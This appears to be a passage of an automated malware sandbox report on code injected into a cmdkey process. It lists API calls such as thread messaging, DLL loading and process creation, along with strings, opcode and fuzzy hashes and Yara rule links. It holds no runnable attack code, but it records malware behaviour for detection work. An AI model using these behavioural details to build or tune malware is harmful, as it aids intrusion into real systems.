                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: c853183130b0b2d944a2ff72c86bd088390b657f1d5a6e1ffd8581f53ef9fd3b
                                                                • Instruction ID: 3f4dc6ce5c76a863d0a4ef3496cfd73066590f3ca8be7ea1e8dd0f6eeed14dcf
                                                                • Opcode Fuzzy Hash: c853183130b0b2d944a2ff72c86bd088390b657f1d5a6e1ffd8581f53ef9fd3b
                                                                • Instruction Fuzzy Hash: 00110636E41218B6EB119A609C46FDF7B38AF81B10F108155F9047F1C1D6B5AA878BD5
                                                                Function 00A1079B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 561 a1079b-a1080e call a2ae30 call a2b840 call a13f00 call a01410 call a21530 574 a10830-a10835 561->574 575 a10810-a10821 PostThreadMessageW 561->575 575->574 576 a10823-a1082d 575->576 576->574
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 346257366466f09e6b4c21dc6c1dbd19e946d09d1d2fc3f5f1a4fca91786cc42
                                                                • Instruction ID: d8c5a827b1320f6cf5a8330ad2a988a7c5b13c2145bbf24198c60d23ce9f7f75
                                                                • Opcode Fuzzy Hash: 346257366466f09e6b4c21dc6c1dbd19e946d09d1d2fc3f5f1a4fca91786cc42
                                                                • Instruction Fuzzy Hash: 8201C472D4121876EB11A7A49C02FDF7B7C9F41B50F048064FA047B2C1D6B46A078BE9
                                                                Function 00A107A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 5d1aa7b175cb4ce6fa2304269b64105637d4170df885482adb0c5c45402237e7
                                                                • Instruction ID: cfefd9967966e238a768f6bce99218f29f6ec7a099367d68a3b7e49fa719efc7
                                                                • Opcode Fuzzy Hash: 5d1aa7b175cb4ce6fa2304269b64105637d4170df885482adb0c5c45402237e7
                                                                • Instruction Fuzzy Hash: B201D672D4121C76EB11A7A48C02FDF7B7C9F40B50F048064FA047B1C1D6B46A078BE9
                                                                Function 00A10712 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 577 a10712-a1080e call a2b840 call a13f00 call a01410 call a21530 588 a10830-a10835 577->588 589 a10810-a10821 PostThreadMessageW 577->589 589->588 590 a10823-a1082d 589->590 590->588
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 8f9b06e85b12511b6e5d747cd6306c00922fa200edce28fc54b155c349155467
                                                                • Instruction ID: 264d15a1d9e4c6241137ca21e94ba3e611bfc95aa8a54ffac5c7884c4b205d18
                                                                • Opcode Fuzzy Hash: 8f9b06e85b12511b6e5d747cd6306c00922fa200edce28fc54b155c349155467
                                                                • Instruction Fuzzy Hash: 1601D836E4122C76EB1157609C42FEF7B389B40B54F108165F9047F181D6B8AA838BE5
                                                                Function 00A10763 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54threadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostThreadMessageW.USER32(267_8V0-3,00000111,00000000,00000000), ref: 00A1081D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 267_8V0-3$267_8V0-3
                                                                • API String ID: 1836367815-80812108
                                                                • Opcode ID: 4eb3bade3de5a3fbfcf980041b9bb4387bf8ec9269ecd8bd0efe441aa2548c76
                                                                • Instruction ID: 0d9e082d65559290aa1da371c9c1aab8c85b7659ec911bd6c80eea6cd4b648c9
                                                                • Opcode Fuzzy Hash: 4eb3bade3de5a3fbfcf980041b9bb4387bf8ec9269ecd8bd0efe441aa2548c76
                                                                • Instruction Fuzzy Hash: 1701D436D412187AEB219B909C42FEF7B389F80B14F118155FE047F181DAB5AA478FE9
                                                                Function 00A233A0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000007D0), ref: 00A2346D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: net.dll$wininet.dll
                                                                • API String ID: 3472027048-1269752229
                                                                • Opcode ID: 45ecf5a6951b55fb5e0d1f9f7736ec931c2bc831e156442d125053dfe846f484
                                                                • Instruction ID: 97f1028b2e8d59b08dcee00bf6672b27de6ad436cb63269077569c444ba0c863
                                                                • Opcode Fuzzy Hash: 45ecf5a6951b55fb5e0d1f9f7736ec931c2bc831e156442d125053dfe846f484
                                                                • Instruction Fuzzy Hash: 193172B1A01705BBCB14DFA4DC85FEABBB8AB88710F50816CF5195B241D374AB41CBA4
                                                                Function 00A1EE40 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: 616c5afefd1b98bc04cf980162749c782cb6ae3efff9dbc72ac1325d412d9b93
                                                                • Instruction ID: 4f32e669eaa5ab963bf7e5fe032e5b752848fa076ae20ff15aed83c09eec312b
                                                                • Opcode Fuzzy Hash: 616c5afefd1b98bc04cf980162749c782cb6ae3efff9dbc72ac1325d412d9b93
                                                                • Instruction Fuzzy Hash: 683130B5A0060AAFDB00DFD8D8809EFB7B9BF88304B108559E905EB214D775EE45CBA1
                                                                Function 00A1EE39 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeUninitialize
                                                                • String ID: @J7<
                                                                • API String ID: 3442037557-2016760708
                                                                • Opcode ID: ebdabcb439aa6e4350ebd5f973c7f30ea1e6f3e0207f73b0a1bcf3d729eb0266
                                                                • Instruction ID: 29a71c0c02a8b0b03816c9d9b61b218070140e7ea2ab0e72eed48a3c48151083
                                                                • Opcode Fuzzy Hash: ebdabcb439aa6e4350ebd5f973c7f30ea1e6f3e0207f73b0a1bcf3d729eb0266
                                                                • Instruction Fuzzy Hash: EC3133B5A0060A9FDB00DFD8D8809EFB7B9FF88304B108559E915EB214D775EE45CBA1
                                                                Function 00A13F00 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A13F72
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
                                                                • Instruction ID: 20dc185c2318caf45c2bdb3e2ca9c218f5004e1db381142934caefde5d1b812d
                                                                • Opcode Fuzzy Hash: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
                                                                • Instruction Fuzzy Hash: D9011EB6D5020DABDF10EBA4ED42FEDB3789B54708F0081A5B9089B241F671EB598B91
                                                                Function 00A290C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00A17CBE,00000010,?,?,?,00000044,?,00000010,00A17CBE,?,?,?), ref: 00A29120
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateInternalProcess
                                                                • String ID:
                                                                • API String ID: 2186235152-0
                                                                • Opcode ID: be6e2b4b46fed9bc9f2a7603e1ab614d440a9f1211cc0ce221f0e506c36f694e
                                                                • Instruction ID: 35fead102a659b7b8bb0697fed8e9ef2419c35947c80e2d720c8d42a683411ba
                                                                • Opcode Fuzzy Hash: be6e2b4b46fed9bc9f2a7603e1ab614d440a9f1211cc0ce221f0e506c36f694e
                                                                • Instruction Fuzzy Hash: 8001D2B2200108BFDB44DF89ED81EEB77ADAF8C714F518608FA09E3241D630F8518BA4
                                                                Function 00A09A50 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A09A92
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: 19ef19eea39feb8021f96fc1a81c5e5e3f53e98904373d5d237afcf38b60c21d
                                                                • Instruction ID: 5b86e3b8293160624f208fcd2770d6937b2a79ab6b342b71ae138c6eaaf80fc1
                                                                • Opcode Fuzzy Hash: 19ef19eea39feb8021f96fc1a81c5e5e3f53e98904373d5d237afcf38b60c21d
                                                                • Instruction Fuzzy Hash: D3F06D7338171436E22062E9AD06FDBB78C8B81BA1F540026FB0CEB1C1D896B84242A4
                                                                Function 00A29030 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,B39CCE1A,00000007,00000000,00000004,00000000,00A1378B,000000F4), ref: 00A2906F
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: cdb08e162a59f461f5c0758b26e2b7ea4b3bc2c575326eb3f8343fb19424bd28
                                                                • Instruction ID: 3f27400ae5d006c1369eda0a3eec9d19055374927a6f6c1a75a3290f0897e5cd
                                                                • Opcode Fuzzy Hash: cdb08e162a59f461f5c0758b26e2b7ea4b3bc2c575326eb3f8343fb19424bd28
                                                                • Instruction Fuzzy Hash: D1E06DB26002047BD614EF58EC41FEB33ADEFC4720F404419F908E7245CA71BA11C6B4
                                                                Function 00A28FE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000104,?,00A210DC,?,?,00A210DC,?,00000104,?), ref: 00A2901C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: f58efcd96ee5265a0f30371f38f36ad268c7dfb1e073293d613f1df82db96e02
                                                                • Instruction ID: 5cc94df534eb80f6901552fc567b16cfe7f873b1e7ba0f2be0eb548ed1446326
                                                                • Opcode Fuzzy Hash: f58efcd96ee5265a0f30371f38f36ad268c7dfb1e073293d613f1df82db96e02
                                                                • Instruction Fuzzy Hash: 03E065B22002087BD614EE99ED46FDB33ADEFC9720F004018F908A7282D631B9208AB4
                                                                Function 00A17CFA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A17D29
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 4a64a65c531f618e0e58cdb4b59a6354bc14bad86004bb02221f9024b9ba32d1
                                                                • Instruction ID: 7f9eec2b5f63b0cf577fcb0d4793c15fc7125ab3102d4b18ed6919646974df41
                                                                • Opcode Fuzzy Hash: 4a64a65c531f618e0e58cdb4b59a6354bc14bad86004bb02221f9024b9ba32d1
                                                                • Instruction Fuzzy Hash: F8E0D8B164060427EB20AB7CEC86BEA33749F58360F644610F815DB1C1DA36D5438B94
                                                                Function 00A17D00 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A17D29
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 158dc98eeab334ebc5bdd7b6e8a787b25cd2a0be99c36510d80ffb36ebf47c06
                                                                • Instruction ID: 2ecb95517da79b31aba535abc742e4fb613985ec7366f6fa73343dd3e673290c
                                                                • Opcode Fuzzy Hash: 158dc98eeab334ebc5bdd7b6e8a787b25cd2a0be99c36510d80ffb36ebf47c06
                                                                • Instruction Fuzzy Hash: 27E026B124030827EB1066B8FC86FBA336C8F48720F540A50F81DCB2C2E938F84346A4
                                                                Function 00A17AE7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00A11720,00A278CF,00A24F8F,00A116F0), ref: 00A17B20
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 5d87bc922163a1d9d6781db68a736059ee251b3c7e5545a168f6bd0ff16b7d0f
                                                                • Instruction ID: 6b6d3f86d0a822652e71664b164d1c776c591ad9de377bd22cd3c49cd1a75b44
                                                                • Opcode Fuzzy Hash: 5d87bc922163a1d9d6781db68a736059ee251b3c7e5545a168f6bd0ff16b7d0f
                                                                • Instruction Fuzzy Hash: 9AE072B2A843083FF304AAF8EC03F9E36AC4B40320F048224F909D72D2E521E4008520
                                                                Function 00A17AF0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00A11720,00A278CF,00A24F8F,00A116F0), ref: 00A17B20
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 51800991041348ecdd517462f8aaebb67e468fa6cc0eb60b962306d4f22c8ad0
                                                                • Instruction ID: 8d40e9a41f88eadd8d7a9fa0562cc33b46251587322c0871cad0f073ce9b83e3
                                                                • Opcode Fuzzy Hash: 51800991041348ecdd517462f8aaebb67e468fa6cc0eb60b962306d4f22c8ad0
                                                                • Instruction Fuzzy Hash: 35D05EB16883083BF614BAE8ED47F4A368C8B44750F014064FA08D72C2E966F91045A5
                                                                Function 03512C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 4d91740498e797b4e66840bc03556300c053ed104b9e89acfd2f655504622486
                                                                • Instruction ID: 1432528235fb15ba53b9005f08983a64565b3f389f8d5f83f399f3effce29efd
                                                                • Opcode Fuzzy Hash: 4d91740498e797b4e66840bc03556300c053ed104b9e89acfd2f655504622486
                                                                • Instruction Fuzzy Hash: 82B09B729015D5D6EA11E76056097177D4477D1715F1EC461D3030647E4739C1D1E175

                                                                Non-executed Functions

                                                                Function 0333DF1A Relevance: 56.5, Strings: 45, Instructions: 215COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817121146.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3330000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                • Opcode ID: 81ba4393f1978ce30631a16503bc1671fa85be2e2f640b705e9d5d93998b2271
                                                                • Instruction ID: ce79c0535678166d1e1e78dcc386fa11dd9e33a08a6cfcd8e527135ee0cd6764
                                                                • Opcode Fuzzy Hash: 81ba4393f1978ce30631a16503bc1671fa85be2e2f640b705e9d5d93998b2271
                                                                • Instruction Fuzzy Hash: F6915EF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                Function 03512890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 34d80bf4c7d696f2f72692b2e825ef21de56588eaa1ec63a7ce687bf53835858
                                                                • Instruction ID: b12fa377aacf3d031908d26969787c161364538f0047bbf0fa1f4ac817f2399b
                                                                • Opcode Fuzzy Hash: 34d80bf4c7d696f2f72692b2e825ef21de56588eaa1ec63a7ce687bf53835858
                                                                • Instruction Fuzzy Hash: 555126B6A00216BFEB10DF9CE98097EFBB8BB48200F548569E4A5D7651D374DE508BA0
                                                                Function 03582410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 1176d45db53c4fb09f79634d16395610f5cce855b6a85617927192fa6781c11a
                                                                • Instruction ID: 791fe83fe4023de6db5c4416e2d8b85510eabe9cd20bc12957a94fcaa5468345
                                                                • Opcode Fuzzy Hash: 1176d45db53c4fb09f79634d16395610f5cce855b6a85617927192fa6781c11a
                                                                • Instruction Fuzzy Hash: DB51E7B9A406456ECB20EF5CD89097EFBF9BF44200F448C5AE4D6EB6A1E774DA008760
                                                                Function 03507630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03544787
                                                                • Execute=1, xrefs: 03544713
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03544725
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03544742
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03544655
                                                                • ExecuteOptions, xrefs: 035446A0
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035446FC
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: 688efa9a784b292c5226feea7f9ebe04472212679abfa0baa1807f192bc89544
                                                                • Instruction ID: fe03cb9460171b50d552fd5fc34f27b851abaeaf2bda95cc7d8bebf5a11a14bf
                                                                • Opcode Fuzzy Hash: 688efa9a784b292c5226feea7f9ebe04472212679abfa0baa1807f192bc89544
                                                                • Instruction Fuzzy Hash: A3513875600309BADB10EAA4FC95FAE73B8BF48304F140499E506AB1E1D772BA458F94
                                                                Function 0351B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: e4a8f3aef2337df1a35bd11b3a1faffd39744aed40da21ddd13fa45d373d468f
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: AA81D075E112499EFF24CE68E8907BEBBB1BF54710F1C4659E851A73B0C7748860CBA0
                                                                Function 035820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
